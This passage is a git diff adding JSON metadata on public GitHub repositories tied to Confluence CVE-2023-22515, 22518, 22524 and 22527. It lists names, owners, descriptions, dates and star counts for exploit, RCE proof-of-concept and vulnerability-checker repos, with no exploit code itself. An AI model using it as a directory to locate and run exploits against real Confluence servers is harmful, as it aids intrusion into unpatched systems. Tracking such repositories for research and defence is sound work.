"html_url": "https:\/\/github.com\/iveresk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/iveresk\/CVE-2023-22515", + "description": "iveresk-CVE-2023-22515", + "fork": false, + "created_at": "2023-10-13T08:36:21Z", + "updated_at": "2023-10-17T06:31:16Z", + "pushed_at": "2023-10-13T15:43:09Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 707587880, + "name": "CVE-2023-22515_RCE", + "full_name": "youcannotseemeagain\/CVE-2023-22515_RCE", + "owner": { + "login": "youcannotseemeagain", + "id": 48853857, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/48853857?v=4", + "html_url": "https:\/\/github.com\/youcannotseemeagain", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/youcannotseemeagain\/CVE-2023-22515_RCE", + "description": "Confluence后台rce", + "fork": false, + "created_at": "2023-10-20T08:23:47Z", + "updated_at": "2024-11-15T06:57:50Z", + "pushed_at": "2023-10-20T08:25:02Z", + "stargazers_count": 19, + "watchers_count": 19, + "has_discussions": false, + "forks_count": 5, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 5, + "watchers": 19, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 708092317, + "name": "cve-2023-22515-exp", + "full_name": "DsaHen\/cve-2023-22515-exp", + "owner": { + "login": "DsaHen", + "id": 83688624, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83688624?v=4", + "html_url": "https:\/\/github.com\/DsaHen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/DsaHen\/cve-2023-22515-exp", + "description": "cve-2023-22515的python利用脚本", + "fork": false, + "created_at": "2023-10-21T13:59:16Z", + "updated_at": "2023-10-21T15:54:08Z", + "pushed_at": "2023-10-21T14:07:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 708570186, + "name": "CVE-2023-22515", + "full_name": "joaoviictorti\/CVE-2023-22515", + "owner": { + "login": "joaoviictorti", + "id": 85838827, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85838827?v=4", + "html_url": "https:\/\/github.com\/joaoviictorti", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/joaoviictorti\/CVE-2023-22515", + "description": "CVE-2023-22515 (Confluence Broken Access Control Exploit)", + "fork": false, + "created_at": "2023-10-22T23:37:56Z", + "updated_at": "2023-12-07T18:07:29Z", + "pushed_at": "2023-11-22T21:44:15Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 710666806, + "name": "CVE-2023-22515", + "full_name": "C1ph3rX13\/CVE-2023-22515", + "owner": { + "login": "C1ph3rX13", + "id": 80873500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4", + "html_url": "https:\/\/github.com\/C1ph3rX13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-22515", + "description": "CVE-2023-22515", + "fork": false, + "created_at": "2023-10-27T07:20:35Z", + "updated_at": "2024-01-14T12:52:24Z", + "pushed_at": "2023-12-12T03:02:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 711670398, + "name": "confluence-hack", + "full_name": "AIex-3\/confluence-hack", + "owner": { + "login": "AIex-3", + "id": 76010792, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/76010792?v=4", + "html_url": "https:\/\/github.com\/AIex-3", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AIex-3\/confluence-hack", + "description": "CVE-2023-22515", + "fork": false, + "created_at": "2023-10-30T00:17:45Z", + "updated_at": "2024-09-02T04:23:40Z", + "pushed_at": "2023-11-10T17:43:40Z", + "stargazers_count": 49, + "watchers_count": 49, + "has_discussions": false, + "forks_count": 7, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "broken-access-control", + "confluence", + "cve-2023-22515", + "cybersecurity", + "exploit", + "privilege-escalation", + "remote-code-execution", + "security", + "vulnerability" + ], + "visibility": "public", + "forks": 7, + "watchers": 49, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 715922032, + "name": "CVE-2023-22515", + "full_name": "LucasPDiniz\/CVE-2023-22515", + "owner": { + "login": "LucasPDiniz", + "id": 57265360, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57265360?v=4", + "html_url": "https:\/\/github.com\/LucasPDiniz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LucasPDiniz\/CVE-2023-22515", + "description": "Server Broken Access Control in Confluence - CVE-2023-22515", + "fork": false, + "created_at": "2023-11-08T05:18:30Z", + "updated_at": "2024-06-30T22:00:53Z", + "pushed_at": "2024-06-30T22:00:50Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "confluence", + "cve", + "cve-2023-22515", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 716585912, + "name": "Confluence-EvilJar", + "full_name": "aaaademo\/Confluence-EvilJar", + "owner": { + "login": "aaaademo", + "id": 147170429, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/147170429?v=4", + "html_url": "https:\/\/github.com\/aaaademo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/aaaademo\/Confluence-EvilJar", + "description": "配合 CVE-2023-22515 后台上传jar包实现RCE", + "fork": false, + "created_at": "2023-11-09T12:55:25Z", + "updated_at": "2024-03-15T16:30:11Z", + "pushed_at": "2023-11-09T14:21:58Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 723825331, + "name": "CVE-2023-22515-Scan.", + "full_name": "edsonjt81\/CVE-2023-22515-Scan.", + "owner": { + "login": "edsonjt81", + "id": 27496739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/27496739?v=4", + "html_url": "https:\/\/github.com\/edsonjt81", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/edsonjt81\/CVE-2023-22515-Scan.", + "description": null, + "fork": false, + "created_at": "2023-11-26T21:24:55Z", + "updated_at": "2023-11-26T21:25:08Z", + "pushed_at": "2024-05-21T04:09:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 724883216, + "name": "cve-2023-22515", + "full_name": "INTfinityConsulting\/cve-2023-22515", + "owner": { + "login": "INTfinityConsulting", + "id": 104363833, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104363833?v=4", + "html_url": "https:\/\/github.com\/INTfinityConsulting", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/INTfinityConsulting\/cve-2023-22515", + "description": "Confluence broken access control to code execution", + "fork": false, + "created_at": "2023-11-29T01:34:35Z", + "updated_at": "2023-11-29T01:37:35Z", + "pushed_at": "2023-11-30T00:02:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 738213429, + "name": "Exploit-CVE-2023-22515", + "full_name": "CalegariMindSec\/Exploit-CVE-2023-22515", + "owner": { + "login": "CalegariMindSec", + "id": 68512056, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68512056?v=4", + "html_url": "https:\/\/github.com\/CalegariMindSec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CalegariMindSec\/Exploit-CVE-2023-22515", + "description": "A simple exploit for CVE-2023-22515", + "fork": false, + "created_at": "2024-01-02T17:40:24Z", + "updated_at": "2024-01-02T23:11:04Z", + "pushed_at": "2024-01-02T23:15:55Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 762759550, + "name": "CVE-2023-22515", + "full_name": "rxerium\/CVE-2023-22515", + "owner": { + "login": "rxerium", + "id": 59293085, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/59293085?v=4", + "html_url": "https:\/\/github.com\/rxerium", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rxerium\/CVE-2023-22515", + "description": "Atlassian Confluence Data Center and Server Broken Access Control Vulnerability", + "fork": false, + "created_at": "2024-02-24T16:04:35Z", + "updated_at": "2024-10-05T06:16:42Z", + "pushed_at": "2024-10-05T06:16:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0day", + "atlassian", + "atlassian-confluence", + "vulnerability" + ], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 792458695, + "name": "NSE--CVE-2023-22515", + "full_name": "fyx1t\/NSE--CVE-2023-22515", + "owner": { + "login": "fyx1t", + "id": 57405939, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57405939?v=4", + "html_url": "https:\/\/github.com\/fyx1t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/fyx1t\/NSE--CVE-2023-22515", + "description": "NSE script for checking the presence of CVE-2023-22515", + "fork": false, + "created_at": "2024-04-26T17:57:33Z", + "updated_at": "2024-11-15T21:14:17Z", + "pushed_at": "2024-04-26T17:58:10Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 811026888, + "name": "CVE-2023-22515-check", + "full_name": "s1d6point7bugcrowd\/CVE-2023-22515-check", + "owner": { + "login": "s1d6point7bugcrowd", + "id": 163605035, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163605035?v=4", + "html_url": "https:\/\/github.com\/s1d6point7bugcrowd", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s1d6point7bugcrowd\/CVE-2023-22515-check", + "description": "This script will inform the user if the Confluence instance is vulnerable, but it will not proceed with the exploitation steps.", + "fork": false, + "created_at": "2024-06-05T19:56:16Z", + "updated_at": "2024-06-20T19:03:26Z", + "pushed_at": "2024-06-20T19:03:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 812408801, + "name": "cve-2023-22515", + "full_name": "xorbbo\/cve-2023-22515", + "owner": { + "login": "xorbbo", + "id": 172144274, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172144274?v=4", + "html_url": "https:\/\/github.com\/xorbbo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xorbbo\/cve-2023-22515", + "description": "NSE script to check if app is vulnerable to cve-2023-22515", + "fork": false, + "created_at": "2024-06-08T20:04:44Z", + "updated_at": "2024-06-08T20:10:35Z", + "pushed_at": "2024-06-08T20:09:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 830699904, + "name": "CVE-2023-22515-NSE", + "full_name": "spareack\/CVE-2023-22515-NSE", + "owner": { + "login": "spareack", + "id": 92234381, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92234381?v=4", + "html_url": "https:\/\/github.com\/spareack", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/spareack\/CVE-2023-22515-NSE", + "description": "Vulnerability checking tool via Nmap Scripting Engine", + "fork": false, + "created_at": "2024-07-18T19:55:59Z", + "updated_at": "2024-11-19T23:11:17Z", + "pushed_at": "2024-11-19T23:11:14Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 831810309, + "name": "CVE-2023-22515", + "full_name": "Onedy1703\/CVE-2023-22515", + "owner": { + "login": "Onedy1703", + "id": 74649794, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74649794?v=4", + "html_url": "https:\/\/github.com\/Onedy1703", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Onedy1703\/CVE-2023-22515", + "description": "CVE 2023-22515", + "fork": false, + "created_at": "2024-07-21T17:19:36Z", + "updated_at": "2024-07-24T15:04:55Z", + "pushed_at": "2024-07-24T15:04:52Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22518.json b/2023/CVE-2023-22518.json new file mode 100644 index 0000000000..719194f0a2 --- /dev/null +++ b/2023/CVE-2023-22518.json @@ -0,0 +1,241 @@ +[ + { + "id": 712257484, + "name": "CVE-2023-22518", + "full_name": "ForceFledgling\/CVE-2023-22518", + "owner": { + "login": "ForceFledgling", + "id": 92352077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/92352077?v=4", + "html_url": "https:\/\/github.com\/ForceFledgling", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ForceFledgling\/CVE-2023-22518", + "description": "Improper Authorization Vulnerability in Confluence Data Center and Server + bonus 🔥", + "fork": false, + "created_at": "2023-10-31T05:35:00Z", + "updated_at": "2024-08-26T13:45:52Z", + "pushed_at": "2023-11-15T09:22:46Z", + "stargazers_count": 55, + "watchers_count": 55, + "has_discussions": false, + "forks_count": 9, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian", + "atlassian-confluence", + "attack", + "backdoor", + "confluence", + "critical", + "cve", + "exploit", + "exploiting", + "hacking", + "hacking-tool", + "improper", + "python", + "shell", + "vulnerabilities", + "vulnerability" + ], + "visibility": "public", + "forks": 9, + "watchers": 55, + "score": 0, + "subscribers_count": 19 + }, + { + "id": 713624699, + "name": "CVE-2023-22518", + "full_name": "davidfortytwo\/CVE-2023-22518", + "owner": { + "login": "davidfortytwo", + "id": 85337431, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/85337431?v=4", + "html_url": "https:\/\/github.com\/davidfortytwo", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/davidfortytwo\/CVE-2023-22518", + "description": "Checker for CVE-2023-22518 vulnerability on Confluence", + "fork": false, + "created_at": "2023-11-02T22:52:15Z", + "updated_at": "2024-05-17T17:07:38Z", + "pushed_at": "2024-05-21T06:45:36Z", + "stargazers_count": 8, + "watchers_count": 8, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 8, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 714542407, + "name": "CVE-2023-22518", + "full_name": "RevoltSecurities\/CVE-2023-22518", + "owner": { + "login": "RevoltSecurities", + "id": 119435129, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4", + "html_url": "https:\/\/github.com\/RevoltSecurities", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2023-22518", + "description": "An Exploitation tool to exploit the confluence server that are vulnerable to CVE-2023-22518 Improper Authorization", + "fork": false, + "created_at": "2023-11-05T06:45:33Z", + "updated_at": "2024-10-26T05:46:02Z", + "pushed_at": "2023-11-05T07:08:41Z", + "stargazers_count": 44, + "watchers_count": 44, + "has_discussions": false, + "forks_count": 16, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 16, + "watchers": 44, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 716451139, + "name": "CVE-2023-22518", + "full_name": "0x0d3ad\/CVE-2023-22518", + "owner": { + "login": "0x0d3ad", + "id": 18898977, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18898977?v=4", + "html_url": "https:\/\/github.com\/0x0d3ad", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0x0d3ad\/CVE-2023-22518", + "description": "Exploit CVE-2023-22518", + "fork": false, + "created_at": "2023-11-09T06:56:18Z", + "updated_at": "2024-08-28T04:28:50Z", + "pushed_at": "2023-11-09T07:42:04Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian", + "confluence", + "cve-2023-22518", + "exploit" + ], + "visibility": "public", + "forks": 2, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 724424925, + "name": "CVE-2023-22518", + "full_name": "C1ph3rX13\/CVE-2023-22518", + "owner": { + "login": "C1ph3rX13", + "id": 80873500, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80873500?v=4", + "html_url": "https:\/\/github.com\/C1ph3rX13", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/C1ph3rX13\/CVE-2023-22518", + "description": "Confluence CVE-2023-22518", + "fork": false, + "created_at": "2023-11-28T03:33:16Z", + "updated_at": "2023-12-20T15:07:46Z", + "pushed_at": "2023-11-28T05:44:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747208015, + "name": "CVE-2023-22518", + "full_name": "bibo318\/CVE-2023-22518", + "owner": { + "login": "bibo318", + "id": 56821442, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56821442?v=4", + "html_url": "https:\/\/github.com\/bibo318", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/bibo318\/CVE-2023-22518", + "description": "Lỗ hổng ủy quyền không phù hợp trong Trung tâm dữ liệu Confluence và Máy chủ + bugsBonus 🔥", + "fork": false, + "created_at": "2024-01-23T13:38:40Z", + "updated_at": "2024-01-24T10:15:44Z", + "pushed_at": "2024-01-24T02:04:40Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 775340661, + "name": "Exploit-CVE-2023-22518", + "full_name": "Lilly-dox\/Exploit-CVE-2023-22518", + "owner": { + "login": "Lilly-dox", + "id": 130746941, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/130746941?v=4", + "html_url": "https:\/\/github.com\/Lilly-dox", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Lilly-dox\/Exploit-CVE-2023-22518", + "description": null, + "fork": false, + "created_at": "2024-03-21T07:55:00Z", + "updated_at": "2024-03-22T15:49:52Z", + "pushed_at": "2024-03-24T01:33:59Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22524.json b/2023/CVE-2023-22524.json new file mode 100644 index 0000000000..eb93888563 --- /dev/null +++ b/2023/CVE-2023-22524.json @@ -0,0 +1,68 @@ +[ + { + "id": 731520651, + "name": "CVE-2023-22524", + "full_name": "imperva\/CVE-2023-22524", + "owner": { + "login": "imperva", + "id": 34535031, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34535031?v=4", + "html_url": "https:\/\/github.com\/imperva", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imperva\/CVE-2023-22524", + "description": null, + "fork": false, + "created_at": "2023-12-14T09:12:11Z", + "updated_at": "2023-12-15T16:41:50Z", + "pushed_at": "2023-12-20T11:01:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 731664456, + "name": "CVE-2023-22524", + "full_name": "ron-imperva\/CVE-2023-22524", + "owner": { + "login": "ron-imperva", + "id": 80413188, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/80413188?v=4", + "html_url": "https:\/\/github.com\/ron-imperva", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ron-imperva\/CVE-2023-22524", + "description": "Atlassian Companion RCE Vulnerability Proof of Concept", + "fork": false, + "created_at": "2023-12-14T15:33:11Z", + "updated_at": "2024-06-21T00:11:48Z", + "pushed_at": "2023-12-15T06:13:34Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "atlassian", + "poc", + "rce" + ], + "visibility": "public", + "forks": 1, + "watchers": 25, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-22527.json b/2023/CVE-2023-22527.json new file mode 100644 index 0000000000..c0d3cdd725 --- /dev/null +++ b/2023/CVE-2023-22527.json @@ -0,0 +1,749 @@ +[ + { + "id": 743909012, + "name": "CVE-2023-22527_Confluence_RCE", + "full_name": "Avento\/CVE-2023-22527_Confluence_RCE", + "owner": { + "login": "Avento", + "id": 13798539, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13798539?v=4", + "html_url": "https:\/\/github.com\/Avento", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Avento\/CVE-2023-22527_Confluence_RCE", + "description": "CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC", + "fork": false, + "created_at": "2024-01-16T08:46:21Z", + "updated_at": "2024-09-02T04:23:53Z", + "pushed_at": "2024-01-23T09:57:31Z", + "stargazers_count": 25, + "watchers_count": 25, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 25, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 744029874, + "name": "patch-diff-CVE-2023-22527", + "full_name": "Sudistark\/patch-diff-CVE-2023-22527", + "owner": { + "login": "Sudistark", + "id": 31372554, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/31372554?v=4", + "html_url": "https:\/\/github.com\/Sudistark", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sudistark\/patch-diff-CVE-2023-22527", + "description": null, + "fork": false, + "created_at": "2024-01-16T13:50:49Z", + "updated_at": "2024-01-20T05:20:44Z", + "pushed_at": "2024-01-18T14:09:39Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 744449379, + "name": "CVE-2023-22527_Confluence_RCE", + "full_name": "ga0we1\/CVE-2023-22527_Confluence_RCE", + "owner": { + "login": "ga0we1", + "id": 96734525, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96734525?v=4", + "html_url": "https:\/\/github.com\/ga0we1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ga0we1\/CVE-2023-22527_Confluence_RCE", + "description": "CVE-2023-22527 - RCE (Remote Code Execution) Vulnerability In Confluence Data Center and Confluence Server PoC", + "fork": false, + "created_at": "2024-01-17T10:21:00Z", + "updated_at": "2024-01-22T12:45:12Z", + "pushed_at": "2024-01-17T07:12:18Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 1, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 746624870, + "name": "CVE-2023-22527", + "full_name": "Drun1baby\/CVE-2023-22527", + "owner": { + "login": "Drun1baby", + "id": 75228348, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75228348?v=4", + "html_url": "https:\/\/github.com\/Drun1baby", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Drun1baby\/CVE-2023-22527", + "description": null, + "fork": false, + "created_at": "2024-01-22T11:38:55Z", + "updated_at": "2024-01-23T01:52:40Z", + "pushed_at": "2024-01-22T12:07:37Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 746667961, + "name": "CVE-2023-22527", + "full_name": "cleverg0d\/CVE-2023-22527", + "owner": { + "login": "cleverg0d", + "id": 108401157, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108401157?v=4", + "html_url": "https:\/\/github.com\/cleverg0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/cleverg0d\/CVE-2023-22527", + "description": "A template injection vulnerability on older versions of Confluence Data Center and Server allows an unauthenticated attacker to achieve RCE on an affected instance. Customers using an affected version must take immediate action.", + "fork": false, + "created_at": "2024-01-22T13:26:45Z", + "updated_at": "2024-01-23T02:20:48Z", + "pushed_at": "2024-01-22T13:31:42Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 746832699, + "name": "CVE-2023-22527", + "full_name": "thanhlam-attt\/CVE-2023-22527", + "owner": { + "login": "thanhlam-attt", + "id": 79523444, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79523444?v=4", + "html_url": "https:\/\/github.com\/thanhlam-attt", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thanhlam-attt\/CVE-2023-22527", + "description": null, + "fork": false, + "created_at": "2024-01-22T19:02:59Z", + "updated_at": "2024-01-27T13:26:05Z", + "pushed_at": "2024-01-25T17:54:24Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 746974310, + "name": "CVE-2023-22527-POC", + "full_name": "Manh130902\/CVE-2023-22527-POC", + "owner": { + "login": "Manh130902", + "id": 93723285, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93723285?v=4", + "html_url": "https:\/\/github.com\/Manh130902", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Manh130902\/CVE-2023-22527-POC", + "description": "A critical severity Remote Code Execution (RCE) vulnerability (CVE-2023-22527) was discovered in Confluence Server and Data Center. ", + "fork": false, + "created_at": "2024-01-23T02:17:36Z", + "updated_at": "2024-10-12T02:06:33Z", + "pushed_at": "2024-01-23T12:03:00Z", + "stargazers_count": 20, + "watchers_count": 20, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 20, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 747056079, + "name": "CVE-2023-22527-confluence", + "full_name": "VNCERT-CC\/CVE-2023-22527-confluence", + "owner": { + "login": "VNCERT-CC", + "id": 94035613, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94035613?v=4", + "html_url": "https:\/\/github.com\/VNCERT-CC", + 